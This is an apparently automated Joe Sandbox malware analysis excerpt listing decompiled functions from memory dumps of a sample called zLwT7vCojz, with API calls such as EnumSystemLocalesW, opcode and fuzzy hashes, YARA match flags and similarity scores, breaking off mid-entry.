                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2299586839-0
                                                                                                                                                                                                                                              • Opcode ID: 0fa90c1a792b4f576805d634ceb77212e8dbb6f590b38d2f3a598ff2e07973d6
                                                                                                                                                                                                                                              • Instruction ID: 01093f619bc32b8fbf4496884a140a7205e31f2f4782fad289f6e45d42228c51
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0fa90c1a792b4f576805d634ceb77212e8dbb6f590b38d2f3a598ff2e07973d6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 48F09671741318BBEB11AF61EC01F7E7B65DF48712F90406AFC0567250CF716E109699
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 04331C6D: RtlEnterCriticalSection.NTDLL(?), ref: 04331C7C
                                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(004170AB,00000001,00439638,0000000C), ref: 04337390
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1272433827-0
                                                                                                                                                                                                                                              • Opcode ID: 7948fd84ff868524a75aefca5004dce8ea0bd2aca87ab7f0ff4530e5da38c521
                                                                                                                                                                                                                                              • Instruction ID: aeec273a4dcb645b9c67a84fc4231e84b9ebce2ab8e69247ef3b22ee643b9625
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7948fd84ff868524a75aefca5004dce8ea0bd2aca87ab7f0ff4530e5da38c521
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 94F04F72A50304AFEB14EF68DC45B9D37F0EF04725F10A12AE514EB2A0CB7459408F89
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00411A06: EnterCriticalSection.KERNEL32(?,?,00416AB9,?,004395B8,00000008,00416B87,?,?,?), ref: 00411A15
                                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(004170AB,00000001,00439638,0000000C), ref: 00417129
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1272433827-0
                                                                                                                                                                                                                                              • Opcode ID: 7948fd84ff868524a75aefca5004dce8ea0bd2aca87ab7f0ff4530e5da38c521
                                                                                                                                                                                                                                              • Instruction ID: 132fde00c3026ba385e258918c38b9eec635062562826c8cbc0ed6069a56d62f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7948fd84ff868524a75aefca5004dce8ea0bd2aca87ab7f0ff4530e5da38c521
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B2F03131A503009FD714EF69D846B9D37F0EB04714F10512BF514EB2E1CB7849408B49
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 04336F80: GetLastError.KERNEL32(?,?,0432E697,?,?,?,0432ED94,?), ref: 04336F84
                                                                                                                                                                                                                                                • Part of subcall function 04336F80: _free.LIBCMT ref: 04336FB7
                                                                                                                                                                                                                                                • Part of subcall function 04336F80: SetLastError.KERNEL32(00000000), ref: 04336FF8
                                                                                                                                                                                                                                                • Part of subcall function 04336F80: _abort.LIBCMT ref: 04336FFE
                                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(00420232,00000001,?,?,?,04340D04,043345A4,?,?,?,?,?,043345A4,?,?,?), ref: 04340579
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1084509184-0
                                                                                                                                                                                                                                              • Opcode ID: 1ba4f1af0ec470da337eca2a097a8a08ef9fea41670d800165add5fa0530a193
                                                                                                                                                                                                                                              • Instruction ID: d05ed0c63cd5342c633c74350e8f0993be6bacf6d13038ac547f77c2041506b8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1ba4f1af0ec470da337eca2a097a8a08ef9fea41670d800165add5fa0530a193
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 91F055363002049BCB189F79D8456BABFE0EFC2714B4A409AFF058B280C631A843CB90
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                                • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                                • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                                • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(00420232,00000001,?,?,?,00420A9D,=CA,?,?,?,?,?,0041433D,?,?,?), ref: 00420312
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1084509184-0
                                                                                                                                                                                                                                              • Opcode ID: 1ba4f1af0ec470da337eca2a097a8a08ef9fea41670d800165add5fa0530a193
                                                                                                                                                                                                                                              • Instruction ID: c54caae612f79c45943fa80a9590922199881531d53ba21540ab7825707139eb
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1ba4f1af0ec470da337eca2a097a8a08ef9fea41670d800165add5fa0530a193
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FEF0273530021497CB149B35E80966ABF90EB81714B86405EEE058B242C6759C43CB54
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00409C12,043295DF), ref: 04329E72
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3192549508-0
                                                                                                                                                                                                                                              • Opcode ID: fb9060c5596e109df2f87e6a451718e1b857c5f9d853ba1192c432bc66ddb262
                                                                                                                                                                                                                                              • Instruction ID: 26a6103bf3a44b775271bddc1855947db1592e5ed7f4ffd05836c10e882115b1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fb9060c5596e109df2f87e6a451718e1b857c5f9d853ba1192c432bc66ddb262
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_00009C12,00409378), ref: 00409C0B
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3192549508-0
                                                                                                                                                                                                                                              • Opcode ID: fb9060c5596e109df2f87e6a451718e1b857c5f9d853ba1192c432bc66ddb262
                                                                                                                                                                                                                                              • Instruction ID: 26a6103bf3a44b775271bddc1855947db1592e5ed7f4ffd05836c10e882115b1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fb9060c5596e109df2f87e6a451718e1b857c5f9d853ba1192c432bc66ddb262
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                                                              • API String ID: 0-4108050209
                                                                                                                                                                                                                                              • Opcode ID: b6b344bc33aa75e8b74452ce0f577aa81992de8fdf6ffb4767baca486ca3f9e2
                                                                                                                                                                                                                                              • Instruction ID: 4d53ac0881a035a5bd95d60716b935a957efe1aa3be314a68b1800bbe5aac491
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6b344bc33aa75e8b74452ce0f577aa81992de8fdf6ffb4767baca486ca3f9e2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BB513231300A7957FB38497C8764BBE73B99F06388F183A1AD84387691D605FA45B352
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                                                              • API String ID: 0-4108050209
                                                                                                                                                                                                                                              • Opcode ID: b6b344bc33aa75e8b74452ce0f577aa81992de8fdf6ffb4767baca486ca3f9e2
                                                                                                                                                                                                                                              • Instruction ID: 94e3407a31f2bbdf6c701076615be5a87d66d0396b04c414de024b601701c707
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6b344bc33aa75e8b74452ce0f577aa81992de8fdf6ffb4767baca486ca3f9e2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F351236160464466DB388D688856BBF23959B25304F18093BEC46B7FC3D63DED0F939E
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: HeapProcess
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 54951025-0
                                                                                                                                                                                                                                              • Opcode ID: e8ed93b8e17730d585274d76292deac119e5b071f80d085d6d237c3884551339
                                                                                                                                                                                                                                              • Instruction ID: d0f1a20189e36393daad9c8fb7d6be9c176ac9989c87cef9d6c19eed9d752231
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e8ed93b8e17730d585274d76292deac119e5b071f80d085d6d237c3884551339
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 09A012306011008B63104F305D8460C3A94594459034500386004C0020DE304094D708
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: d0dd073aee0751bb9f29e6e223ed45b7845f72cc89632174a73f14db3effea76
                                                                                                                                                                                                                                              • Instruction ID: f7246f358eead72590201e80fcec4c79c46f6691cdae857f55203416c7e6201f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d0dd073aee0751bb9f29e6e223ed45b7845f72cc89632174a73f14db3effea76
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 38320232E69F014DD7239635CD62336A249AFB73C4F55D737E82AB5AA5EB28C4C34108
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                                              • Instruction ID: d71b2d45d6d587f9c1ccd0a7a03c3b76c70b65e4c03c7c955b593a1ae29cc19d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 869157722084B34ADB6E467E963443FFFE15A422A131A379ED4F2CB5C5FE24E164D620
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                                              • Instruction ID: 2a58f6a2309fccaa231e80b192b86db65d6159ebe224a31801071a150f3da30d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 939176726080A389E729477984B403FFFE15A513A131A07BFE4F2DE2C5EE38C555E628
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                                              • Instruction ID: 1f93916732f5bef93ba0aec60dea9e942b596ce0289334895c1d1991dc10b68d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9F915A732090B34EEB69463E867803DFFE15A422A171E379ED4F2CA5C5FE14E264D620
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                                              • Instruction ID: ed0e070ae82ea7b03d452a3238dcfa200e972e8fd778a390062a8eb07dfcae26
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0B9188721080E38AD729433984B403FFFE15A523A131A47BFD8F2DA2C5EE38D565D624
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                                              • Instruction ID: a1ce57146e022f59295ab6ef4fd59565376a955944d92dd3dd223fd7e76b0e04
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 319176722084B34ADB2D467E967503EFFE15B422A130A779EE4F2CA5C1FE14F164DA20
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                                              • Instruction ID: 6e91bfac425e3a666a0d8c6cf14f20edb49d438ec97fef1b2b2bf4ad68d189c8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CC9153721080A349DB294639857457FFFE1DA513A131A07BFE4F2EB2C1EF3885549AAC
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                                                                                                              • Instruction ID: fee4cdd08afd2022bd286f779ea537db1867bb5bd1a7cfa999549e41f2ae3383
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 138156722080B34ADB6D4E3E967457EFFE15A412A130A679EE4F2CE5C1FE14F164DA20
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                                                                                                              • Instruction ID: 21a1932339db512cfe7dd20ca352f55fe73c90360b224481a7d01d4506c652c6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 408155722080A34AEB294639847403FFFE1DA513A131A07BFE4F2DA6C5EF38D555966C
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 2cbad533a1824a8130a83b46c13d05f503e78228f30930f5b8921947ce36f803
                                                                                                                                                                                                                                              • Instruction ID: eaf60fd4a6414e416714384e2038e6bfd0a2c5dd50028b12a52d43e38ae33222
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2cbad533a1824a8130a83b46c13d05f503e78228f30930f5b8921947ce36f803
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A81103B72011B247D614CE7DEAB42BEF785FBC6320B2D737AD0818B759D222B645D604
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 2cbad533a1824a8130a83b46c13d05f503e78228f30930f5b8921947ce36f803
                                                                                                                                                                                                                                              • Instruction ID: e6e99f41677c303f580e472dd2adf8d7d27793ec118e7d73ac2b1e44355bdfb2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2cbad533a1824a8130a83b46c13d05f503e78228f30930f5b8921947ce36f803
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 301105B7200183C7D6148B6DC8F45B7A795EAC6320B2D437BD441AB7D8D33AA9459E0C
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558366239.00000000043AD000.00000040.00000020.00020000.00000000.sdmp, Offset: 043AD000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_43ad000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                                                              • Instruction ID: 07468e9002178722b2ce085288cdec5a44da1d19e83ba1586efb16b2663a1880
